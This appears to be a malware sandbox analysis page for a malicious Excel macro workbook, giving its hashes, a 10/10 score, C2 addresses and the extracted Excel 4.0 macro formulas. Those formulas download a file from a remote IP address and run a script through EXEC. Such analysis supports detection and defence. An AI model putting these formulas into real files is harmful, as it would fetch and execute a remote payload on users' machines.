Overview

overview

10

Static

static

10

78177e6cbd...6.xlsm

windows7-x64

10

78177e6cbd...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    78177e6cbdfa5ccd5600af9597421126

  • Size

    6KB

  • MD5

    78177e6cbdfa5ccd5600af9597421126

  • SHA1

    f3da5abfeafa9c91068fdb2f485dd983ce70cba5

  • SHA256

    6f7db3d682e8c0b539b6f5c762b1edc270997896a21f25f1c38538e96f49081b

  • SHA512

    53fd9fc23e66c87decbeb53e940ff54fca985f92a74779385c1bb245c297d37ed365abc116df3d10493f255e9dcabdb634f7ad17ec6e5b83e490d60ecb816642

  • SSDEEP

    192:NDS9uSvbrA2OmmfRi8UhHFBFYusb98ycj+VSV+:NuugM2w41FY1b98ycaSV+

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 78177e6cbdfa5ccd5600af9597421126
    .xlsm office2007